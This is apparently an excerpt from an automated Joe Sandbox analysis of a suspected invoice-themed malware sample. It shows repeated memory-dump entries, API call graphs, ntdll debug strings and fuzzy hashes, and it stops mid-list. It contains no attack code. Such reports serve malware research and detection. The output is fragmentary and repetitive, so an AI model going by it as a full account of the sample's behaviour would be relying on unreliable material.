                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_187d000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1631090849.000000000187D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0187D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_187d000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1631090849.000000000187D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0187D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_187d000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1631090849.000000000187D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0187D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_187d000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1631069635.000000000186D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0186D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_186d000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1631069635.000000000186D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0186D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_186d000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1631198919.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_1900000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:1.3%
                                                                                                                                        Dynamic/Decrypted Code Coverage:4.8%
                                                                                                                                        Signature Coverage:7.5%
                                                                                                                                        Total number of Nodes:146
                                                                                                                                        Total number of Limit Nodes:12

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 333 417673-41769c call 42de13 336 4176a2-4176b0 call 42e333 333->336 337 41769e-4176a1 333->337 340 4176c0-4176d1 call 42c7e3 336->340 341 4176b2-4176bd call 42e5d3 336->341 346 4176d3-4176e7 LdrLoadDll 340->346 347 4176ea-4176ed 340->347 341->340 346->347
                                                                                                                                        APIs
                                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004176E5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Load
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2234796835-0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 353 42b233-42b26f call 404933 call 42c2f3 NtClose
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 367 1032b60-1032b6c LdrInitializeThunk
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 369 1032df0-1032dfc LdrInitializeThunk
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 368 1032c70-1032c7c LdrInitializeThunk
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • PostThreadMessageW.USER32(C3vB7APK,00000111,00000000,00000000), ref: 00413CEA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                        • String ID: C3vB7APK$C3vB7APK
                                                                                                                                        • API String ID: 1836367815-224894077
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • PostThreadMessageW.USER32(C3vB7APK,00000111,00000000,00000000), ref: 00413CEA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                        • String ID: C3vB7APK$C3vB7APK
                                                                                                                                        • API String ID: 1836367815-224894077
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 38 42b5a3-42b5e4 call 404933 call 42c2f3 RtlFreeHeap
                                                                                                                                        APIs
                                                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B5DF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeHeap
                                                                                                                                        • String ID: !dA
                                                                                                                                        • API String ID: 3298025750-3330550368
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 348 42b553-42b597 call 404933 call 42c2f3 RtlAllocateHeap
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(?,0041DEAB,?,?,00000000,?,0041DEAB,?,?,?), ref: 0042B592
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 358 42b5f3-42b62f call 404933 call 42c2f3 ExitProcess
                                                                                                                                        APIs
                                                                                                                                        • ExitProcess.KERNEL32(?,00000000,?,?,A337B7DB,?,?,A337B7DB), ref: 0042B62A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExitProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 621844428-0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 363 1032c0a-1032c0f 364 1032c11-1032c18 363->364 365 1032c1f-1032c26 LdrInitializeThunk 363->365
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        • The resource is owned shared by %d threads, xrefs: 010A8E2E
                                                                                                                                        • This failed because of error %Ix., xrefs: 010A8EF6
                                                                                                                                        • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 010A8DC4
                                                                                                                                        • *** enter .exr %p for the exception record, xrefs: 010A8FA1
                                                                                                                                        • The critical section is owned by thread %p., xrefs: 010A8E69
                                                                                                                                        • *** then kb to get the faulting stack, xrefs: 010A8FCC
                                                                                                                                        • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 010A8DB5
                                                                                                                                        • Go determine why that thread has not released the critical section., xrefs: 010A8E75
                                                                                                                                        • read from, xrefs: 010A8F5D, 010A8F62
                                                                                                                                        • The instruction at %p referenced memory at %p., xrefs: 010A8EE2
                                                                                                                                        • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 010A8E3F
                                                                                                                                        • an invalid address, %p, xrefs: 010A8F7F
                                                                                                                                        • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 010A8DD3
                                                                                                                                        • *** Inpage error in %ws:%s, xrefs: 010A8EC8
                                                                                                                                        • *** A stack buffer overrun occurred in %ws:%s, xrefs: 010A8DA3
                                                                                                                                        • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 010A8D8C
                                                                                                                                        • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 010A8E4B
                                                                                                                                        • <unknown>, xrefs: 010A8D2E, 010A8D81, 010A8E00, 010A8E49, 010A8EC7, 010A8F3E
                                                                                                                                        • The instruction at %p tried to %s , xrefs: 010A8F66
                                                                                                                                        • The resource is owned exclusively by thread %p, xrefs: 010A8E24
                                                                                                                                        • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 010A8E86
                                                                                                                                        • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 010A8FEF
                                                                                                                                        • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 010A8F2D
                                                                                                                                        • a NULL pointer, xrefs: 010A8F90
                                                                                                                                        • *** An Access Violation occurred in %ws:%s, xrefs: 010A8F3F
                                                                                                                                        • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 010A8F26
                                                                                                                                        • write to, xrefs: 010A8F56
                                                                                                                                        • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 010A8F34
                                                                                                                                        • *** Resource timeout (%p) in %ws:%s, xrefs: 010A8E02
                                                                                                                                        • *** enter .cxr %p for the context, xrefs: 010A8FBD
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                                                        • API String ID: 0-108210295
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                        • API String ID: 0-2160512332
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        • Critical section debug info address, xrefs: 0106541F, 0106552E
                                                                                                                                        • corrupted critical section, xrefs: 010654C2
                                                                                                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010654E2
                                                                                                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 01065543
                                                                                                                                        • Critical section address, xrefs: 01065425, 010654BC, 01065534
                                                                                                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010654CE
                                                                                                                                        • Invalid debug info address of this critical section, xrefs: 010654B6
                                                                                                                                        • undeleted critical section in freed memory, xrefs: 0106542B
                                                                                                                                        • double initialized or corrupted critical section, xrefs: 01065508
                                                                                                                                        • Thread identifier, xrefs: 0106553A
                                                                                                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0106540A, 01065496, 01065519
                                                                                                                                        • Critical section address., xrefs: 01065502
                                                                                                                                        • 8, xrefs: 010652E3
                                                                                                                                        • Address of the debug info found in the active list., xrefs: 010654AE, 010654FA
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                        • API String ID: 0-2368682639
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 010622E4
                                                                                                                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 010624C0
                                                                                                                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01062624
                                                                                                                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 0106261F
                                                                                                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 010625EB
                                                                                                                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01062409
                                                                                                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01062506
                                                                                                                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01062602
                                                                                                                                        • @, xrefs: 0106259B
                                                                                                                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01062412
                                                                                                                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01062498
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                        • API String ID: 0-4009184096
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                        • API String ID: 0-2515994595
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                                                        • API String ID: 0-3197712848
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                        • API String ID: 0-1700792311
                                                                                                                                        • Opcode ID: 31672cac190c6ac230af5793a6b3e571c6d7b7b7e6f3bfb69ee48475a46d24ee
                                                                                                                                        • Instruction ID: 3846616a65f2c57c69baa0671cc34d781847f305010fda4f2dc71de790cb03e9
                                                                                                                                        • Opcode Fuzzy Hash: 31672cac190c6ac230af5793a6b3e571c6d7b7b7e6f3bfb69ee48475a46d24ee
                                                                                                                                        • Instruction Fuzzy Hash: EFD1023190068ADFDB22DFA9C441AAEBBF1FF49704F488099F5C59B256C739E980DB50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        • HandleTraces, xrefs: 01078C8F
                                                                                                                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01078A3D
                                                                                                                                        • AVRF: -*- final list of providers -*- , xrefs: 01078B8F
                                                                                                                                        • VerifierDlls, xrefs: 01078CBD
                                                                                                                                        • VerifierDebug, xrefs: 01078CA5
                                                                                                                                        • VerifierFlags, xrefs: 01078C50
                                                                                                                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01078A67
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                        • API String ID: 0-3223716464
                                                                                                                                        • Opcode ID: 52b83c9ff32403df48efff250fdba228ad429d4e812840404e4734a603a6880b
                                                                                                                                        • Instruction ID: d41f8f2a2cf258bf1a8b0d263080349a4079bd04dbcc3bd5e0b03d32c802a347
                                                                                                                                        • Opcode Fuzzy Hash: 52b83c9ff32403df48efff250fdba228ad429d4e812840404e4734a603a6880b
                                                                                                                                        • Instruction Fuzzy Hash: 02913771E01316AFD721EF298C84B6A77E4AB54B24F04895EFAC06F281C775EC00CB99
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 01074DF5
                                                                                                                                        • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 01074E38
                                                                                                                                        • LdrpProtectedCopyMemory, xrefs: 01074DF4
                                                                                                                                        • ***Exception thrown within loader***, xrefs: 01074E27
                                                                                                                                        • Execute '.cxr %p' to dump context, xrefs: 01074EB1
                                                                                                                                        • LdrpGenericExceptionFilter, xrefs: 01074DFC
                                                                                                                                        • minkernel\ntdll\ldrutil.c, xrefs: 01074E06
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                                                                                        • API String ID: 0-2973941816
                                                                                                                                        • Opcode ID: 3c73c24a2530516efe8fa93184988e5e2147c736d15f4fa06048b4bbefe6be29
                                                                                                                                        • Instruction ID: 6d2ff1c7cf5cf6f231a73627c77655bbd016e6bc6d99284aa737a8a61ada8d00
                                                                                                                                        • Opcode Fuzzy Hash: 3c73c24a2530516efe8fa93184988e5e2147c736d15f4fa06048b4bbefe6be29
                                                                                                                                        • Instruction Fuzzy Hash: 32218E726481067BE3289B6C9C45D3A7BDDFB85B70F180951F2E1DB681C550DE00C22A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                        • API String ID: 0-1109411897
                                                                                                                                        • Opcode ID: 58b48bcd03dcb4767a9bc319d4b7567de57462847220c841a2c6f79c052261f5
                                                                                                                                        • Instruction ID: d73b11b6db4f2849f99fcbd2444a75b08be54bc19c23e535b6ec05d9d23d4d0f
                                                                                                                                        • Opcode Fuzzy Hash: 58b48bcd03dcb4767a9bc319d4b7567de57462847220c841a2c6f79c052261f5
                                                                                                                                        • Instruction Fuzzy Hash: BBA24D75E056298FDBA4DF18C8887AEBBB1AF45314F2441E9D94DA7260EB309EC5DF00
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                        • API String ID: 0-792281065
                                                                                                                                        • Opcode ID: 238ea66c99addc632606eff384d9bd8a7ccd844a3b286f96e9c1163f8f532307
                                                                                                                                        • Instruction ID: c1570a651f7fa6f7e83981b1da91456e963d22317c07a0caf70ae6a9649b2e29
                                                                                                                                        • Opcode Fuzzy Hash: 238ea66c99addc632606eff384d9bd8a7ccd844a3b286f96e9c1163f8f532307
                                                                                                                                        • Instruction Fuzzy Hash: A9912470B00326DBEB35DF59D844BAE7BE9BB50B18F140169E9C0AF2C1DB769841C791
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01049A11, 01049A3A
                                                                                                                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 010499ED
                                                                                                                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01049A01
                                                                                                                                        • apphelp.dll, xrefs: 00FE6496
                                                                                                                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01049A2A
                                                                                                                                        • LdrpInitShimEngine, xrefs: 010499F4, 01049A07, 01049A30
